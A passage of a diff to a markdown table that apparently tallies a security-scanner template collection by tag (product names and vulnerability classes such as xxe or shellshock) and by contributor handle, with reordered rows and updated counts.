| | | deserialization | 13 | incogbyte | 4 | | | | | | | -| dns | 13 | nodauf | 4 | | | | | | | -| android | 13 | github.com/its0x08 | 4 | | | | | | | -| zoho | 13 | z3bd | 3 | | | | | | | -| adobe | 13 | shifacyclewala | 3 | | | | | | | -| dlink | 12 | dudez | 3 | | | | | | | -| wp-theme | 12 | binaryfigments | 3 | | | | | | | -| jenkins | 12 | mavericknerd | 3 | | | | | | | -| manageengine | 12 | idealphase | 3 | | | | | | | -| cve2013 | 11 | skeltavik | 3 | | | | | | | -| magento | 11 | _generic_human_ | 3 | | | | | | | -| intrusive | 10 | yash anand @yashanand155 | 3 | | | | | | | -| hp | 10 | 0w4ys | 3 | | | | | | | -| dell | 10 | sullo | 3 | | | | | | | -| xxe | 10 | me9187 | 3 | | | | | | | -| kubernetes | 9 | sushantkamble | 3 | | | | | | | -| vmware | 9 | vsh00t | 3 | | | | | | | -| ftp | 9 | unstabl3 | 3 | | | | | | | -| cnvd | 8 | impramodsargar | 3 | | | | | | | -| nginx | 8 | fyoorer | 3 | | | | | | | -| microsoft | 8 | jarijaas | 3 | | | | | | | -| scada | 8 | f1tz | 3 | | | | | | | -| ibm | 8 | shine | 3 | | | | | | | -| airflow | 8 | emenalf | 3 | | | | | | | -| rails | 8 | thomas_from_offensity | 3 | | | | | | | -| ruijie | 8 | johnjhacking | 3 | | | | | | | -| fastjson | 8 | joeldeleep | 2 | | | | | | | -| gitlab | 8 | bp0lr | 2 | | | | | | | -| cve2008 | 8 | g4l1t0 | 2 | | | | | | | -| backup | 8 | bing0o | 2 | | | | | | | -| cms | 7 | mohammedsaneem | 2 | | | | | | | -| coldfusion | 7 | w4cky_ | 2 | | | | | | | -| netgear | 7 | randomrobbie | 2 | | | | | | | -| files | 7 | kiblyn11 | 2 | | | | | | | +| zoho | 13 | nodauf | 4 | | | | | | | +| dns | 13 | johnjhacking | 3 | | | | | | | +| android | 13 | fyoorer | 3 | | | | | | | +| adobe | 13 | emenalf | 3 | | | | | | | +| manageengine | 12 | thomas_from_offensity | 3 | | | | | | | +| dlink | 12 | f1tz | 3 | | | | | | | +| wp-theme | 12 | jarijaas | 3 | | | | | | | +| jenkins | 12 | impramodsargar | 3 | | | | | | | +| magento | 11 | yash anand @yashanand155 | 3 | | | | | | | +| cve2013 | 11 | _generic_human_ | 3 | | | | | | | +| intrusive | 10 | binaryfigments | 3 | | | | | | | +| xxe | 10 | tess | 3 | | | | | | | +| dell | 10 | 0w4ys | 3 | | | | | | | +| hp | 10 | unstabl3 | 3 | | | | | | | +| vmware | 9 | dudez | 3 | | | | | | | +| kubernetes | 9 | shine | 3 | | | | | | | +| ftp | 9 | vsh00t | 3 | | | | | | | +| gitlab | 8 | mavericknerd | 3 | | | | | | | +| cve2008 | 8 | sushantkamble | 3 | | | | | | | +| backup | 8 | me9187 | 3 | | | | | | | +| scada | 8 | sullo | 3 | | | | | | | +| rails | 8 | z3bd | 3 | | | | | | | +| ibm | 8 | shifacyclewala | 3 | | | | | | | +| ruijie | 8 | skeltavik | 3 | | | | | | | +| cnvd | 8 | idealphase | 3 | | | | | | | +| nginx | 8 | bp0lr | 2 | | | | | | | +| airflow | 8 | 0xrudra | 2 | | | | | | | +| microsoft | 8 | socketz | 2 | | | | | | | +| fastjson | 8 | g4l1t0 | 2 | | | | | | | +| netgear | 7 | 0xsapra | 2 | | | | | | | +| cms | 7 | w4cky_ | 2 | | | | | | | | confluence | 7 | udit_thakkur | 2 | | | | | | | -| drupal | 6 | koti2 | 2 | | | | | | | -| laravel | 6 | davidmckennirey | 2 | | | | | | | -| phpmyadmin | 6 | arcc | 2 | | | | | | | -| camera | 6 | gal nagli | 2 | | | | | | | -| solr | 6 | parth | 2 | | | | | | | -| citrix | 6 | huowuzhao | 2 | | | | | | | -| lucee | 6 | hetroublemakr | 2 | | | | | | | -| nodejs | 6 | 0xcrypto | 2 | | | | | | | -| jetty | 6 | nkxxkn | 2 | | | | | | | -| docker | 6 | swissky | 2 | | | | | | | -| fileupload | 6 | dheerajmadhukar | 2 | | | | | | | -| rconfig | 6 | lotusdll | 2 | | | | | | | -| django | 6 | 0xsmiley | 2 | | | | | | | -| api | 6 | r3naissance | 2 | | | | | | | -| printer | 5 | gevakun | 2 | | | | | | | -| jolokia | 5 | pxmme1337 | 2 | | | | | | | -| tomcat | 5 | x1m_martijn | 2 | | | | | | | -| java | 5 | ehsahil | 2 | | | | | | | -| headless | 5 | socketz | 2 | | | | | | | -| circarlife | 5 | r12w4n | 2 | | | | | | | -| ssti | 5 | whoever | 2 | | | | | | | -| crlf | 5 | ree4pwn | 2 | | | | | | | -| dedecms | 5 | alifathi-h1 | 2 | | | | | | | -| windows | 5 | afaq | 2 | | | | | | | -| iis | 5 | convisoappsec | 2 | | | | | | | -| npm | 4 | bernardofsr | 2 | | | | | | | -| amazon | 4 | vavkamil | 2 | | | | | | | -| zabbix | 4 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| fatpipe | 4 | 0xprial | 2 | | | | | | | -| samsung | 4 | 0xsapra | 2 | | | | | | | -| hongdian | 4 | amsda | 2 | | | | | | | -| solarwinds | 4 | random-robbie | 2 | | | | | | | -| slack | 4 | moritz nentwig | 2 | | | | | | | -| thinkphp | 4 | 0xelkomy | 2 | | | | | | | +| coldfusion | 7 | bernardofsr | 2 | | | | | | | +| files | 7 | arcc | 2 | | | | | | | +| drupal | 6 | r3naissance | 2 | | | | | | | +| jetty | 6 | 0xelkomy | 2 | | | | | | | +| laravel | 6 | parth | 2 | | | | | | | +| docker | 6 | 0xsmiley | 2 | | | | | | | +| nodejs | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| solr | 6 | pxmme1337 | 2 | | | | | | | +| lucee | 6 | dheerajmadhukar | 2 | | | | | | | +| rconfig | 6 | koti2 | 2 | | | | | | | +| django | 6 | hetroublemakr | 2 | | | | | | | +| fileupload | 6 | davidmckennirey | 2 | | | | | | | +| api | 6 | huowuzhao | 2 | | | | | | | +| camera | 6 | vavkamil | 2 | | | | | | | +| citrix | 6 | amsda | 2 | | | | | | | +| windows | 5 | mohammedsaneem | 2 | | | | | | | +| jolokia | 5 | fabaff | 2 | | | | | | | +| ssti | 5 | sy3omda | 2 | | | | | | | +| iis | 5 | cocxanh | 2 | | | | | | | +| tomcat | 5 | foulenzer | 2 | | | | | | | +| java | 5 | r12w4n | 2 | | | | | | | +| phpmyadmin | 5 | hahwul | 2 | | | | | | | +| printer | 5 | whoever | 2 | | | | | | | +| dedecms | 5 | x1m_martijn | 2 | | | | | | | +| crlf | 5 | gevakun | 2 | | | | | | | +| headless | 5 | kiblyn11 | 2 | | | | | | | +| circarlife | 5 | joeldeleep | 2 | | | | | | | +| solarwinds | 4 | 0xprial | 2 | | | | | | | +| thinkphp | 4 | afaq | 2 | | | | | | | +| npm | 4 | ree4pwn | 2 | | | | | | | +| strapi | 4 | gal nagli | 2 | | | | | | | +| resin | 4 | randomrobbie | 2 | | | | | | | +| thinkcmf | 4 | manas_harsh | 2 | | | | | | | +| grafana | 4 | nkxxkn | 2 | | | | | | | +| webserver | 4 | zomsop82 | 2 | | | | | | | +| hongdian | 4 | 0xcrypto | 2 | | | | | | | +| fatpipe | 4 | random-robbie | 2 | | | | | | | | elastic | 4 | bsysop | 2 | | | | | | | -| git | 4 | manas_harsh | 2 | | | | | | | -| moodle | 4 | zomsop82 | 2 | | | | | | | -| webserver | 4 | sy3omda | 2 | | | | | | | -| buffalo | 4 | 0xrudra | 2 | | | | | | | -| strapi | 4 | fabaff | 2 | | | | | | | -| magmi | 4 | hahwul | 2 | | | | | | | -| maps | 4 | foulenzer | 2 | | | | | | | -| proxy | 4 | cocxanh | 2 | | | | | | | -| grafana | 4 | push4d | 1 | | | | | | | -| rfi | 4 | thevillagehacker | 1 | | | | | | | -| firmware | 4 | elouhi | 1 | | | | | | | -| thinkcmf | 4 | kurohost | 1 | | | | | | | -| firebase | 4 | naglinagli | 1 | | | | | | | -| resin | 4 | sicksec | 1 | | | | | | | -| exchange | 4 | luci | 1 | | | | | | | -| vpn | 4 | kishore krishna (sillydaddy) | 1 | | | | | | | -| glpi | 4 | makyotox | 1 | | | | | | | -| wso2 | 4 | undefl0w | 1 | | | | | | | -| artifactory | 4 | patralos | 1 | | | | | | | -| symfony | 4 | omarkurt | 1 | | | | | | | -| zimbra | 4 | bolli95 | 1 | | | | | | | -| symantec | 4 | orpheus | 1 | | | | | | | -| traversal | 4 | cristi vlad (@cristivlad25) | 1 | | | | | | | -| asp | 4 | infosecsanyam | 1 | | | | | | | -| kibana | 3 | oscarintherocks | 1 | | | | | | | -| kafka | 3 | intx0x80 | 1 | | | | | | | -| ebs | 3 | wabafet | 1 | | | | | | | -| vbulletin | 3 | borna nematzadeh | 1 | | | | | | | -| mongodb | 3 | nerrorsec | 1 | | | | | | | -| azure | 3 | becivells | 1 | | | | | | | -| hoteldruid | 3 | remonsec | 1 | | | | | | | -| lansweeper | 3 | andirrahmani1 | 1 | | | | | | | -| backdoor | 3 | @ofjaaah | 1 | | | | | | | -| tikiwiki | 3 | yashanand155 | 1 | | | | | | | -| druid | 3 | toufik airane | 1 | | | | | | | -| bigip | 3 | exploitation | 1 | | | | | | | -| openssh | 3 | alex | 1 | | | | | | | -| httpd | 3 | b0rn2r00t | 1 | | | | | | | -| springcloud | 3 | smaranchand | 1 | | | | | | | -| cves | 3 | akash.c | 1 | | | | | | | -| cloud | 3 | raesene | 1 | | | | | | | -| fanruan | 3 | aresx | 1 | | | | | | | -| smtp | 3 | juicypotato1 | 1 | | | | | | | -| openam | 3 | forgedhallpass | 1 | | | | | | | -| kevinlab | 3 | mah3sec_ | 1 | | | | | | | -| nosqli | 3 | shreyapohekar | 1 | | | | | | | -| ssh | 3 | 0xrod | 1 | | | | | | | -| mail | 3 | 0h1in9e | 1 | | | | | | | -| terramaster | 3 | berkdusunur | 1 | | | | | | | -| nacos | 3 | retr0 | 1 | | | | | | | -| node | 3 | b4uh0lz | 1 | | | | | | | -| prometheus | 3 | notsoevilweasel | 1 | | | | | | | -| jeesns | 3 | @dwisiswant0 | 1 | | | | | | | -| oa | 3 | jteles | 1 | | | | | | | -| search | 3 | c3l3si4n | 1 | | | | | | | -| exposures | 3 | chron0x | 1 | | | | | | | -| lfr | 3 | mubassirpatel | 1 | | | | | | | -| ofbiz | 3 | schniggie | 1 | | | | | | | -| opensis | 3 | d0rkerdevil | 1 | | | | | | | -| injection | 3 | izn0u | 1 | | | | | | | -| microstrategy | 3 | ahmed sherif | 1 | | | | | | | -| cve2007 | 3 | 0xd0ff9 | 1 | | | | | | | -| caucho | 3 | thebinitghimire | 1 | | | | | | | -| targa | 3 | mass0ma | 1 | | | | | | | -| log | 3 | _harleo | 1 | | | | | | | -| linkerd | 3 | rodnt | 1 | | | | | | | -| jellyfin | 3 | willd96 | 1 | | | | | | | -| nexus | 3 | furkansenan | 1 | | | | | | | -| cacti | 3 | aaron_costello | 1 | | | | | | | +| maps | 4 | moritz nentwig | 2 | | | | | | | +| exchange | 4 | alifathi-h1 | 2 | | | | | | | +| traversal | 4 | swissky | 2 | | | | | | | +| firmware | 4 | bing0o | 2 | | | | | | | +| rfi | 4 | convisoappsec | 2 | | | | | | | +| samsung | 4 | lotusdll | 2 | | | | | | | +| symantec | 4 | ehsahil | 2 | | | | | | | +| amazon | 4 | mubassirpatel | 1 | | | | | | | +| symfony | 4 | smaranchand | 1 | | | | | | | +| zabbix | 4 | omarkurt | 1 | | | | | | | +| wso2 | 4 | thevillagehacker | 1 | | | | | | | +| asp | 4 | mhdsamx | 1 | | | | | | | +| glpi | 4 | micha3lb3n | 1 | | | | | | | +| firebase | 4 | taielab | 1 | | | | | | | +| zimbra | 4 | luskabol | 1 | | | | | | | +| vpn | 4 | iampritam | 1 | | | | | | | +| git | 4 | hanlaomo | 1 | | | | | | | +| artifactory | 4 | ohlinge | 1 | | | | | | | +| slack | 4 | regala_ | 1 | | | | | | | +| buffalo | 4 | petruknisme | 1 | | | | | | | +| magmi | 4 | j33n1k4 | 1 | | | | | | | +| proxy | 4 | tirtha_mandal | 1 | | | | | | | +| moodle | 4 | 0ut0fb4nd | 1 | | | | | | | +| fpd | 3 | aceseven (digisec360) | 1 | | | | | | | +| nosqli | 3 | soyelmago | 1 | | | | | | | +| jeesns | 3 | 0xteles | 1 | | | | | | | +| caucho | 3 | wabafet | 1 | | | | | | | +| openam | 3 | evolutionsec | 1 | | | | | | | +| tikiwiki | 3 | udyz | 1 | | | | | | | +| terramaster | 3 | yashgoti | 1 | | | | | | | +| springcloud | 3 | akash.c | 1 | | | | | | | +| ebs | 3 | alperenkesk | 1 | | | | | | | +| lansweeper | 3 | dawid-czarnecki | 1 | | | | | | | +| cacti | 3 | kba@sogeti_esec | 1 | | | | | | | +| telerik | 3 | fmunozs | 1 | | | | | | | +| exposures | 3 | naglinagli | 1 | | | | | | | +| lfr | 3 | elder tao | 1 | | | | | | | +| prometheus | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| vbulletin | 3 | sec_hawk | 1 | | | | | | | +| httpd | 3 | elouhi | 1 | | | | | | | +| smtp | 3 | alex | 1 | | | | | | | +| fanruan | 3 | pudsec | 1 | | | | | | | +| itop | 3 | jrolf | 1 | | | | | | | +| cve2007 | 3 | qlkwej | 1 | | | | | | | +| kevinlab | 3 | co0nan | 1 | | | | | | | +| mail | 3 | oscarintherocks | 1 | | | | | | | +| backdoor | 3 | manuelbua | 1 | | | | | | | +| ofbiz | 3 | affix | 1 | | | | | | | +| r-seenet | 3 | vzamanillo | 1 | | | | | | | +| opensis | 3 | noamrathaus | 1 | | | | | | | +| kafka | 3 | @dwisiswant0 | 1 | | | | | | | +| openssh | 3 | un-fmunozs | 1 | | | | | | | +| cloud | 3 | notsoevilweasel | 1 | | | | | | | +| github | 3 | andirrahmani1 | 1 | | | | | | | +| jellyfin | 3 | shelld3v | 1 | | | | | | | +| search | 3 | bad5ect0r | 1 | | | | | | | +| hoteldruid | 3 | nytr0gen | 1 | | | | | | | +| log | 3 | its0x08 | 1 | | | | | | | +| druid | 3 | mesaglio | 1 | | | | | | | +| linkerd | 3 | 52971 | 1 | | | | | | | +| targa | 3 | ratnadip gajbhiye | 1 | | | | | | | +| nacos | 3 | flag007 | 1 | | | | | | | +| microstrategy | 3 | mass0ma | 1 | | | | | | | +| node | 3 | deena | 1 | | | | | | | +| injection | 3 | 0xtavian | 1 | | | | | | | +| cves | 3 | @ofjaaah | 1 | | | | | | | +| bitrix | 3 | b4uh0lz | 1 | | | | | | | +| nexus | 3 | apt-mirror | 1 | | | | | | | +| bigip | 3 | whynotke | 1 | | | | | | | +| oa | 3 | _darrenmartyn | 1 | | | | | | | +| ssh | 3 | knassar702 | 1 | | | | | | | +| azure | 3 | gboddin | 1 | | | | | | | +| zhiyuan | 3 | c3l3si4n | 1 | | | | | | | +| mongodb | 3 | rojanrijal | 1 | | | | | | | +| kibana | 3 | jeya seelan | 1 | | | | | | | +| mcafee | 2 | luci | 1 | | | | | | | +| nextcloud | 2 | sicksec | 1 | | | | | | | +| xxljob | 2 | bolli95 | 1 | | | | | | | +| bruteforce | 2 | push4d | 1 | | | | | | | +| hashicorp | 2 | defr0ggy | 1 | | | | | | | +| ec2 | 2 | ahmed sherif | 1 | | | | | | | +| wuzhicms | 2 | 0xd0ff9 | 1 | | | | | | | +| axis | 2 | shreyapohekar | 1 | | | | | | | +| netis | 2 | infosecsanyam | 1 | | | | | | | +| splunk | 2 | forgedhallpass | 1 | | | | | | | +| chiyu | 2 | aaron_costello | 1 | | | | | | | | | | (@conspiracyproof) | | | | | | | | -| fpd | 3 | taielab | 1 | | | | | | | -| itop | 3 | ohlinge | 1 | | | | | | | -| bitrix | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| zhiyuan | 3 | nvn1729 | 1 | | | | | | | -| github | 3 | tim_koopmans | 1 | | | | | | | -| r-seenet | 3 | j33n1k4 | 1 | | | | | | | -| telerik | 3 | udyz | 1 | | | | | | | -| bypass | 2 | ratnadip gajbhiye | 1 | | | | | | | -| prestashop | 2 | luskabol | 1 | | | | | | | -| idrac | 2 | ldionmarcil | 1 | | | | | | | -| flir | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| smb | 2 | adrianmf | 1 | | | | | | | -| jeedom | 2 | evolutionsec | 1 | | | | | | | -| minio | 2 | affix | 1 | | | | | | | -| phpcollab | 2 | gboddin | 1 | | | | | | | -| huawei | 2 | mhdsamx | 1 | | | | | | | -| jboss | 2 | yavolo | 1 | | | | | | | -| getsimple | 2 | rotemreiss | 1 | | | | | | | -| aruba | 2 | zandros0 | 1 | | | | | | | -| axis2 | 2 | deena | 1 | | | | | | | -| wordfence | 2 | 52971 | 1 | | | | | | | -| saltstack | 2 | hanlaomo | 1 | | | | | | | -| hostheader-injection | 2 | petruknisme | 1 | | | | | | | -| vrealize | 2 | nytr0gen | 1 | | | | | | | -| frp | 2 | th3.d1p4k | 1 | | | | | | | -| icewarp | 2 | _darrenmartyn | 1 | | | | | | | -| cve2005 | 2 | @github.com/defr0ggy | 1 | | | | | | | -| mida | 2 | kre80r | 1 | | | | | | | -| waf | 2 | kabirsuda | 1 | | | | | | | -| service | 2 | alph4byt3 | 1 | | | | | | | -| hjtcloud | 2 | knassar702 | 1 | | | | | | | -| upload | 2 | philippdelteil | 1 | | | | | | | -| lotus | 2 | elmahdi | 1 | | | | | | | -| activemq | 2 | blckraven | 1 | | | | | | | -| qihang | 2 | sec_hawk | 1 | | | | | | | -| guacamole | 2 | yashgoti | 1 | | | | | | | -| plesk | 2 | co0nan | 1 | | | | | | | -| hasura | 2 | alperenkesk | 1 | | | | | | | -| bucket | 2 | kba@sogeti_esec | 1 | | | | | | | -| linux | 2 | b0yd | 1 | | | | | | | -| dos | 2 | absshax | 1 | | | | | | | -| nextcloud | 2 | streetofhackerr007 | 1 | | | | | | | -| pega | 2 | whynotke | 1 | | | | | | | -| adminer | 2 | noamrathaus | 1 | | | | | | | -| axis | 2 | ahmetpergamum | 1 | | | | | | | -| dolibarr | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| rstudio | 2 | yavolo | 1 | | | | | | | +| yii | 2 | toufik airane | 1 | | | | | | | +| ucmdb | 2 | ooooooo_q | 1 | | | | | | | +| frp | 2 | mah3sec_ | 1 | | | | | | | +| smb | 2 | akshansh | 1 | | | | | | | +| guacamole | 2 | remonsec | 1 | | | | | | | +| ecology | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| rancher | 2 | kre80r | 1 | | | | | | | +| jeedom | 2 | thebinitghimire | 1 | | | | | | | +| s3 | 2 | th3.d1p4k | 1 | | | | | | | +| icewarp | 2 | 0h1in9e | 1 | | | | | | | +| bucket | 2 | alph4byt3 | 1 | | | | | | | +| places | 2 | rotemreiss | 1 | | | | | | | +| tidb | 2 | clarkvoss | 1 | | | | | | | +| hostheader-injection | 2 | cookiehanhoan | 1 | | | | | | | +| getsimple | 2 | ldionmarcil | 1 | | | | | | | +| hasura | 2 | nerrorsec | 1 | | | | | | | +| maian | 2 | @github.com/defr0ggy | 1 | | | | | | | +| heroku | 2 | brabbit10 | 1 | | | | | | | +| voipmonitor | 2 | fopina | 1 | | | | | | | +| text | 2 | d0rkerdevil | 1 | | | | | | | +| cve2005 | 2 | s1r1u5_ | 1 | | | | | | | +| trixbox | 2 | pratik khalane | 1 | | | | | | | +| hjtcloud | 2 | yashanand155 | 1 | | | | | | | +| sitecore | 2 | tim_koopmans | 1 | | | | | | | +| totemomail | 2 | zhenwarx | 1 | | | | | | | +| cache | 2 | hakluke | 1 | | | | | | | +| saltstack | 2 | raesene | 1 | | | | | | | +| showdoc | 2 | chron0x | 1 | | | | | | | +| axis2 | 2 | _c0wb0y_ | 1 | | | | | | | +| wordfence | 2 | j3ssie/geraldino2 | 1 | | | | | | | +| yapi | 2 | b0yd | 1 | | | | | | | +| db | 2 | blckraven | 1 | | | | | | | +| prestashop | 2 | ahmetpergamum | 1 | | | | | | | +| jboss | 2 | lark lab | 1 | | | | | | | +| activemq | 2 | schniggie | 1 | | | | | | | +| justwriting | 2 | retr0 | 1 | | | | | | | +| hpe | 2 | patralos | 1 | | | | | | | +| vcenter | 2 | 0xrod | 1 | | | | | | | +| horde | 2 | pdp | 1 | | | | | | | +| kong | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | +| upload | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | | | | security | | | | | | | | -| couchdb | 2 | aceseven (digisec360) | 1 | | | | | | | -| s3 | 2 | elder tao | 1 | | | | | | | -| netsweeper | 2 | sickwell | 1 | | | | | | | -| qcubed | 2 | shifacyclewla | 1 | | | | | | | -| globalprotect | 2 | lark lab | 1 | | | | | | | -| favicon | 2 | mesaglio | 1 | | | | | | | -| embed | 2 | droberson | 1 | | | | | | | -| commax | 2 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| places | 2 | 0xtavian | 1 | | | | | | | -| oauth | 2 | ajaysenr | 1 | | | | | | | -| webcam | 2 | bjhulst | 1 | | | | | | | -| backups | 2 | cookiehanhoan | 1 | | | | | | | -| vcenter | 2 | ringo | 1 | | | | | | | -| totemomail | 2 | hakluke | 1 | | | | | | | -| yii | 2 | brabbit10 | 1 | | | | | | | -| text | 2 | kareemse1im | 1 | | | | | | | -| db | 2 | regala_ | 1 | | | | | | | -| glassfish | 2 | pudsec | 1 | | | | | | | -| rockmongo | 2 | bernardo rodrigues | 1 | | | | | | | +| adminer | 2 | nvn1729 | 1 | | | | | | | +| pega | 2 | ilovebinbash | 1 | | | | | | | +| status | 2 | daviey | 1 | | | | | | | +| backups | 2 | _harleo | 1 | | | | | | | +| flir | 2 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| fortios | 2 | manuelbua | 1 | | | | | | | -| chyrp | 2 | tirtha_mandal | 1 | | | | | | | -| ucmdb | 2 | xstp | 1 | | | | | | | -| akamai | 2 | shelld3v | 1 | | | | | | | -| shellshock | 2 | pdp | 1 | | | | | | | -| middleware | 2 | defr0ggy | 1 | | | | | | | -| igs | 2 | dawid-czarnecki | 1 | | | | | | | -| sonarqube | 2 | flag007 | 1 | | | | | | | -| ecoa | 2 | micha3lb3n | 1 | | | | | | | -| keycloak | 2 | jeya seelan | 1 | | | | | | | -| bitly | 2 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| akkadian | 2 | akshansh | 1 | | | | | | | -| kong | 2 | bad5ect0r | 1 | | | | | | | -| chamilo | 2 | thezakman | 1 | | | | | | | -| wuzhicms | 2 | soyelmago | 1 | | | | | | | -| horde | 2 | s1r1u5_ | 1 | | | | | | | -| nextjs | 2 | un-fmunozs | 1 | | | | | | | -| payara | 2 | j3ssie/geraldino2 | 1 | | | | | | | -| electron | 2 | iampritam | 1 | | | | | | | -| prtg | 2 | 0xteles | 1 | | | | | | | -| voipmonitor | 2 | pratik khalane | 1 | | | | | | | -| bruteforce | 2 | fmunozs | 1 | | | | | | | -| sharepoint | 2 | x6263 | 1 | | | | | | | -| rancher | 2 | clarkvoss | 1 | | | | | | | -| openfire | 2 | geraldino2 | 1 | | | | | | | -| maian | 2 | ipanda | 1 | | | | | | | -| xxljob | 2 | sshell | 1 | | | | | | | -| status | 2 | zhenwarx | 1 | | | | | | | -| sonicwall | 2 | apt-mirror | 1 | | | | | | | -| liferay | 2 | andysvints | 1 | | | | | | | -| avantfax | 2 | revblock | 1 | | | | | | | -| netis | 2 | fopina | 1 | | | | | | | -| splunk | 2 | _c0wb0y_ | 1 | | | | | | | -| odoo | 2 | ooooooo_q | 1 | | | | | | | -| openvpn | 2 | 0ut0fb4nd | 1 | | | | | | | -| ilo | 2 | qlkwej | 1 | | | | | | | -| mailchimp | 2 | daviey | 1 | | | | | | | -| justwriting | 2 | jrolf | 1 | | | | | | | -| rstudio | 2 | rojanrijal | 1 | | | | | | | -| chiyu | 2 | its0x08 | 1 | | | | | | | -| kentico | 2 | vzamanillo | 1 | | | | | | | -| enumeration | 2 | ilovebinbash | 1 | | | | | | | -| jsf | 2 | | | | | | | | | -| hpe | 2 | | | | | | | | | -| mcafee | 2 | | | | | | | | | -| tidb | 2 | | | | | | | | | -| grav | 2 | | | | | | | | | -| cache | 2 | | | | | | | | | -| sitecore | 2 | | | | | | | | | -| natshell | 2 | | | | | | | | | -| leak | 2 | | | | | | | | | -| trixbox | 2 | | | | | | | | | -| geowebserver | 2 | | | | | | | | | -| harbor | 2 | | | | | | | | | -| yapi | 2 | | | | | | | | | -| aviatrix | 2 | | | | | | | | | +| nextjs | 2 | sshell | 1 | | | | | | | +| service | 2 | aresx | 1 | | | | | | | +| embed | 2 | undefl0w | 1 | | | | | | | +| shellshock | 2 | izn0u | 1 | | | | | | | +| sonarqube | 2 | borna nematzadeh | 1 | | | | | | | +| harbor | 2 | xstp | 1 | | | | | | | +| glassfish | 2 | juicypotato1 | 1 | | | | | | | +| igs | 2 | zandros0 | 1 | | | | | | | +| enumeration | 2 | furkansenan | 1 | | | | | | | +| dolibarr | 2 | bjhulst | 1 | | | | | | | +| aruba | 2 | rodnt | 1 | | | | | | | +| ilo | 2 | revblock | 1 | | | | | | | +| chyrp | 2 | adrianmf | 1 | | | | | | | +| seeyon | 2 | b0rn2r00t | 1 | | | | | | | +| waf | 2 | kurohost | 1 | | | | | | | +| akamai | 2 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| sharepoint | 2 | ipanda | 1 | | | | | | | +| rockmongo | 2 | sickwell | 1 | | | | | | | +| mida | 2 | jteles | 1 | | | | | | | +| middleware | 2 | makyotox | 1 | | | | | | | +| plesk | 2 | droberson | 1 | | | | | | | +| electron | 2 | orpheus | 1 | | | | | | | +| odoo | 2 | intx0x80 | 1 | | | | | | | +| lotus | 2 | becivells | 1 | | | | | | | +| natshell | 2 | absshax | 1 | | | | | | | +| qihang | 2 | ajaysenr | 1 | | | | | | | +| kentico | 2 | streetofhackerr007 | 1 | | | | | | | +| paloalto | 2 | thezakman | 1 | | | | | | | +| avantfax | 2 | philippdelteil | 1 | | | | | | | +| favicon | 2 | elmahdi | 1 | | | | | | | +| ecoa | 2 | shifacyclewla | 1 | | | | | | | +| oauth | 2 | ringo | 1 | | | | | | | +| huawei | 2 | x6263 | 1 | | | | | | | +| dos | 2 | geraldino2 | 1 | | | | | | | +| openvpn | 2 | willd96 | 1 | | | | | | | +| aviatrix | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| nagios | 2 | andysvints | 1 | | | | | | | +| bitly | 2 | exploitation | 1 | | | | | | | +| phpcollab | 2 | kareemse1im | 1 | | | | | | | +| vrealize | 2 | kabirsuda | 1 | | | | | | | +| openfire | 2 | berkdusunur | 1 | | | | | | | +| fortios | 2 | | | | | | | | | +| payara | 2 | | | | | | | | | +| mailchimp | 2 | | | | | | | | | +| chamilo | 2 | | | | | | | | | +| netsweeper | 2 | | | | | | | | | +| couchdb | 2 | | | | | | | | | | spark | 2 | | | | | | | | | -| paloalto | 2 | | | | | | | | | -| storage | 2 | | | | | | | | | +| liferay | 2 | | | | | | | | | +| commax | 2 | | | | | | | | | +| keycloak | 2 | | | | | | | | | +| bypass | 2 | | | | | | | | | +| geowebserver | 2 | | | | | | | | | +| webcam | 2 | | | | | | | | | +| jsf | 2 | | | | | | | | | +| grav | 2 | | | | | | | | | +| qcubed | 2 | | | | | | | | | +| minio | 2 | | | | | | | | | +| sonicwall | 2 | | | | | | | | | | emerge | 2 | | | | | | | | | -| heroku | 2 | | | | | | | | | -| seeyon | 2 | | | | | | | | | -| showdoc | 2 | | | | | | | | | -| nagios | 2 | | | | | | | | | -| hashicorp | 2 | | | | | | | | | -| ecology | 2 | | | | | | | | | -| ec2 | 2 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| myvuehelp | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| openx | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| kindeditor | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| glowroot | 1 | | | | | | | | | -| gespage | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| geolocation | 1 | | | | | | | | | -| clink-office | 1 | | | | | | | | | -| announcekit | 1 | | | | | | | | | -| limit | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| sar2html | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| exponentcms | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| eyelock | 1 | | | | | | | | | -| perl | 1 | | | | | | | | | -| artica | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | +| storage | 2 | | | | | | | | | +| prtg | 2 | | | | | | | | | +| linux | 2 | | | | | | | | | +| leak | 2 | | | | | | | | | +| globalprotect | 2 | | | | | | | | | +| idrac | 2 | | | | | | | | | +| akkadian | 2 | | | | | | | | | | mysql | 1 | | | | | | | | | -| travis | 1 | | | | | | | | | -| asana | 1 | | | | | | | | | -| hiawatha | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| argussurveillance | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| minimouse | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| panasonic | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| timezone | 1 | | | | | | | | | -| yealink | 1 | | | | | | | | | -| spring | 1 